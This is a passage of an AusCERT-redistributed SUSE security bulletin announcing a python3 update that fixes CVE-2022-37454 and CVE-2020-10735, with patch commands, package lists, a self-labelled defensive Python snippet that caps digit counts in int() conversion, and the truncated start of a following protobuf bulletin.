SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS
SUSE Linux Enterprise Micro 5.1
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise Server 15-SP1-BCL
SUSE Linux Enterprise Server 15-SP1-LTSS
SUSE Linux Enterprise Server 15-SP2-BCL
SUSE Linux Enterprise Server 15-SP2-LTSS
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server for SAP 15-SP1
SUSE Linux Enterprise Server for SAP 15-SP2
SUSE Manager Proxy 4.1
SUSE Manager Retail Branch Server 4.1
SUSE Manager Server 4.1
______________________________________________________________________________
An update that fixes two vulnerabilities is now available.
Description:
This update for python3 fixes the following issues:
o CVE-2022-37454: Fixed a buffer overflow in hashlib.sha3_* implementations.
(bsc#1204577)
o CVE-2020-10735: Limited the number of digits accepted when converting text to
int and vice versa. (bsc#1203125)
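CVE-2020-10735 is the quadratic cost of converting very long decimal strings to int (and ints back to decimal text), which upstream bounded with a digit limit (sys.set_int_max_str_digits, default 4300) that does not apply to power-of-two bases because those convert in linear time. The Python below is an added example, not code from SUSE or from CPython: an application-side wrapper that enforces the same kind of limit before calling int(), so that a service parsing untrusted numbers keeps the protection on an interpreter that has not yet received this update. The function names and the 4300 default are assumptions that mirror the upstream fix.

```python
"""Bound the cost of untrusted str -> int conversion (CVE-2020-10735).

Added example: application-side guard that mirrors the limit CPython's fix
introduced, for code that must run on interpreters with and without the fix.
"""
import sys

# Default digit limit adopted by the upstream fix (assumption mirrored here).
DEFAULT_MAX_DIGITS = 4300


def interpreter_enforces_limit():
    """True when the running CPython carries the fix (the limit API exists)."""
    return hasattr(sys, "get_int_max_str_digits")


def _is_power_of_two(base):
    return base & (base - 1) == 0


def safe_int(text, base=10, max_digits=DEFAULT_MAX_DIGITS):
    """int(text, base) for untrusted input with a digit-count cap.

    Conversion in a non-power-of-two base is quadratic in the digit count, so
    oversized inputs are refused up front. Bases 2, 4, 8, 16 and 32 convert in
    linear time and are exempt, as in the upstream fix.
    """
    if not isinstance(text, str):
        raise TypeError("safe_int expects a str")
    if not 2 <= base <= 36:
        raise ValueError("base must be in 2..36")
    if _is_power_of_two(base):
        return int(text, base)
    # Count only digit characters: ignore surrounding whitespace, the sign
    # and '_' group separators, all of which int() accepts.
    digits = text.strip().lstrip("+-").replace("_", "")
    if len(digits) > max_digits:
        raise ValueError(
            f"refusing to convert {len(digits)} digits (limit {max_digits})")
    return int(text, base)


def interpreter_rejects(n_digits):
    """Whether bare int() on this interpreter already refuses n_digits digits."""
    try:
        int("9" * n_digits)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("interpreter enforces a limit:", interpreter_enforces_limit())
    print("bare int() refuses 5000 digits:", interpreter_rejects(5000))
    try:
        safe_int("9" * 5000)
    except ValueError as exc:
        print("safe_int:", exc)
```

On an updated interpreter both the bare int() and safe_int refuse the 5000-digit input; on an older one only safe_int does, which is the point of keeping the check in application code until every host is patched.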
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o SUSE Manager Server 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.1-2022-3924=1
o SUSE Manager Retail Branch Server 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.1-2022-3924=1
o SUSE Manager Proxy 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.1-2022-3924=1
o SUSE Linux Enterprise Server for SAP 15-SP2:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP2-2022-3924=1
o SUSE Linux Enterprise Server for SAP 15-SP1:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP1-2022-3924=1
o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2022-3924=1
o SUSE Linux Enterprise Server 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-LTSS-2022-3924=1
o SUSE Linux Enterprise Server 15-SP2-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-BCL-2022-3924=1
o SUSE Linux Enterprise Server 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-LTSS-2022-3924=1
o SUSE Linux Enterprise Server 15-SP1-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP1-BCL-2022-3924=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2022-3924=1
o SUSE Linux Enterprise Micro 5.1:
zypper in -t patch SUSE-SUSE-MicroOS-5.1-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-LTSS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-ESPOS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-LTSS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP1-ESPOS-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3924=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3924=1
o SUSE Enterprise Storage 7:
zypper in -t patch SUSE-Storage-7-2022-3924=1
o SUSE Enterprise Storage 6:
zypper in -t patch SUSE-Storage-6-2022-3924=1
o SUSE CaaS Platform 4.0:
To install this update, use the SUSE CaaS Platform 'skuba' tool. It will
inform you if it detects new updates and then let you trigger updating of
the complete cluster in a controlled way.
Package List:
o SUSE Manager Server 4.1 (ppc64le s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Manager Retail Branch Server 4.1 (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Manager Proxy 4.1 (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server for SAP 15-SP2 (ppc64le x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server for SAP 15-SP1 (ppc64le x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server for SAP 15 (ppc64le x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP2-LTSS (aarch64 ppc64le s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP2-BCL (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP1-LTSS (aarch64 ppc64le s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-SP1-BCL (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Server 15-LTSS (aarch64 s390x):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise Micro 5.1 (aarch64 s390x x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Enterprise Storage 7 (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE Enterprise Storage 6 (aarch64 x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
o SUSE CaaS Platform 4.0 (x86_64):
libpython3_6m1_0-3.6.15-150000.3.116.1
libpython3_6m1_0-debuginfo-3.6.15-150000.3.116.1
python3-3.6.15-150000.3.116.1
python3-base-3.6.15-150000.3.116.1
python3-base-debuginfo-3.6.15-150000.3.116.1
python3-core-debugsource-3.6.15-150000.3.116.1
python3-curses-3.6.15-150000.3.116.1
python3-curses-debuginfo-3.6.15-150000.3.116.1
python3-dbm-3.6.15-150000.3.116.1
python3-dbm-debuginfo-3.6.15-150000.3.116.1
python3-debuginfo-3.6.15-150000.3.116.1
python3-debugsource-3.6.15-150000.3.116.1
python3-devel-3.6.15-150000.3.116.1
python3-devel-debuginfo-3.6.15-150000.3.116.1
python3-idle-3.6.15-150000.3.116.1
python3-testsuite-3.6.15-150000.3.116.1
python3-tk-3.6.15-150000.3.116.1
python3-tk-debuginfo-3.6.15-150000.3.116.1
python3-tools-3.6.15-150000.3.116.1
References:
o https://www.suse.com/security/cve/CVE-2020-10735.html
o https://www.suse.com/security/cve/CVE-2022-37454.html
o https://bugzilla.suse.com/1203125
o https://bugzilla.suse.com/1204577
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yG0ckNZI30y1K9AQiiaw/+LPHOcQsZV5OYxAOW88524poMBxJmAmIg
WkmmKezjsIVLu03xDH3m0wssKh+uDA+jtMZ7d+zljH3xqi6EdOzTXUeoVGXX2csH
brBL8aXRzn/OtffkjguO79uv9k6ZTV789xK6WywNH8CkTQEVl3KJT53TH6LDXRY2
LCtch8LpDBw8kw87uTVn4v2JygLeclarB5uaFNRkeHQVW2mRdjMzlMHqXlZ2ajeu
H6hBvsr57pY2BicUuuDgSD2R8kjTOghTtERtNzLZ0bVo2pMzQhKdPR1NJtVCU/QS
MNggx4ncjlrjFJYz7vE+yFQhZXJMOnk9s+ikN7TnfVo/Z8F4l0L0flLuvdVv3EfZ
QJKvht7gGAKUm7PvkzQMCBT3fnLUtGazOsinf7UqM8BinLXKX04Q/9kWoKNuvr5C
5/By0I0LE66+uzW8aj+3PQZbGZFOoQpuwcPU7pEtJE3U8JKdy4KAMQRo19pZc6W1
qVoNN0nuGR2nn9cSXB/E/W/IVZv45Mw2A1DuANSL8hJjk/8u6kWd9ufJKU4J8pG1
X+WtSBm1NiSJfaQBycxBrZ9PSE4pHoEB4QZ3AIInResn4duYaJCk8sPkIePxN/yu
ME5WR9vnc+bbvRd3yf3NuURB0QLe53fM6inrO3ii2WjgUmT8kv5ZOxcUzYEQrexQ
0V+tfcN9iW8=
=pp0V
-----END PGP SIGNATURE-----
ESB-2022.5779 - [SUSE] protobuf: CVSS (Max): 7.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5779
Security update for protobuf
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: protobuf
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
CVE Names: CVE-2022-3171 CVE-2022-1941 CVE-2021-22569
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223922-1
Comment: CVSS (Max): 7.5 CVE-2022-3171 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVSS Source: SUSE
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for protobuf
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3922-1
Rating: important
References: #1194530 #1203681 #1204256
Cross-References: CVE-2021-22569 CVE-2022-1941 CVE-2022-3171
Affected Products:
SUSE Enterprise Storage 7
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise Desktop 15-SP2
SUSE Linux Enterprise Desktop 15-SP3
SUSE Linux Enterprise Desktop 15-SP4
SUSE Linux Enterprise High Performance Computing 15-SP2
